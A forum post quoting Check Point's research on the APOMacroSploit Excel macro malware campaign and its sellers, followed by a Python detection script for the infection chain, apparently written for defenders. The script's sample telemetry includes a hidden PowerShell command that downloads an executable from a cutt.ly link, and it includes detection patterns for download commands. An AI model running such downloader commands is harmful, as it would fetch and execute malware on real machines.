ApoMacroSploit : Apocalyptical FUD Race
upnorth wrote:

Quote: "At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to evade detection by Windows Defender and is updated daily to ensure low detection rates. In this article, we reveal the threat actors' malicious intentions and disclose the real identity of one attacker. We reported this information to the relevant law enforcement authorities.

The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim's machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries.

The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command "attrib" enables the BAT script to hide in the victim's machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion.

At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end."

Quote: "Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware.

After digging in Nitrix's Twitter account, we finally obtained his identity: he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014."

Full source:
https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/
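The post above describes an endpoint chain that is easy to hunt for in process-creation telemetry: Excel spawning a shell, a BAT file hidden with attrib +h, and PowerShell that pairs Start-Sleep with a download from a URL shortener. The following detection sketch is an added example written for this page, not code from Check Point, from the APOMacroSploit tool, or from the poster. The events are constructed to resemble Sysmon Event ID 1 fields (hostnames, user, paths and file names are invented), and the shortener list is an assumption: only cutt.ly is named in the article.

```python
"""Hunt for the Excel -> BAT -> attrib +h -> PowerShell downloader chain in
process-creation telemetry.

Added example for this page; not the tool's or the researchers' code.
SAMPLE_EVENTS are constructed Sysmon-style events with invented paths.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Only cutt.ly appears in the article; the other entries are an assumed extension.
URL_SHORTENERS = {"cutt.ly", "bit.ly", "tinyurl.com", "is.gd", "t.co"}

# PowerShell download primitives (curl/wget are built-in aliases of Invoke-WebRequest).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod"
    r"|start-bitstransfer|\bcurl\b|\bwget\b"
)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)")
SCRIPT_RE = re.compile(r"[\w.-]+\.(?:bat|cmd)\b")


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    host: str
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list[Alert]:
    """Apply the four chain-specific rules to one process-creation event."""
    alerts: list[Alert] = []
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    cl = ev.command_line.lower()

    # 1. An Office host spawning a shell: the XLM macro's first visible action.
    if parent in OFFICE_HOSTS and image in SHELLS:
        alerts.append(Alert(ev.host, "office_spawns_shell", f"{parent} -> {image}"))

    # 2. attrib +h applied to a .bat/.cmd: the downloader hiding itself.
    if image.startswith("attrib") and "+h" in cl:
        m = SCRIPT_RE.search(cl)
        if m:
            alerts.append(Alert(ev.host, "attrib_hides_script", m.group(0)))

    # 3. PowerShell that both sleeps and downloads: Start-Sleep used as
    #    instruction reordering / delay rather than for any functional reason.
    if image in POWERSHELL and "start-sleep" in cl and DOWNLOAD_RE.search(cl):
        alerts.append(Alert(ev.host, "powershell_sleep_download", cl[:80]))

    # 4. Any command line fetching from a public URL shortener.
    for h in URL_HOST_RE.findall(cl):
        if h in URL_SHORTENERS:
            alerts.append(Alert(ev.host, "url_shortener_fetch", h))
    return alerts


def detect(events: list[ProcEvent]) -> list[Alert]:
    return [a for ev in events for a in check_event(ev)]


def chains_by_host(alerts: list[Alert]) -> dict[str, set[str]]:
    """Group fired rules per host so a full chain stands out from a lone hit."""
    out: dict[str, set[str]] = {}
    for a in alerts:
        out.setdefault(a.host, set()).add(a.rule)
    return out


# Constructed sample telemetry: ws01 shows the described chain, ws02 is benign.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\jdoe\AppData\Local\Temp\invoice.bat"'),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\attrib.exe",
              r"attrib +h +s C:\Users\jdoe\AppData\Local\Temp\invoice.bat"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"Start-Sleep 4; (New-Object Net.WebClient)"
              ".DownloadFile('https://cutt.ly/abcd123', 'C:\\Users\\jdoe\\AppData\\Local\\Temp\\svc.exe')\""),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-ChildItem C:\\Temp"),
    ProcEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for host, rules in chains_by_host(detect(SAMPLE_EVENTS)).items():
        print(host, sorted(rules))
```

Rule 1 alone is noisy in environments with legitimate Office automation, and rule 4 alone only says a shortener was used; the value is in `chains_by_host`, where the ws01 host trips all four rules while ws02 trips none. In a real pipeline the `cutt.ly` hit would also be the pivot for the "key mistake" the article mentions: because the shortener redirects the client straight to the download server, the follow-on DNS or proxy log for that host exposes the real distribution infrastructure.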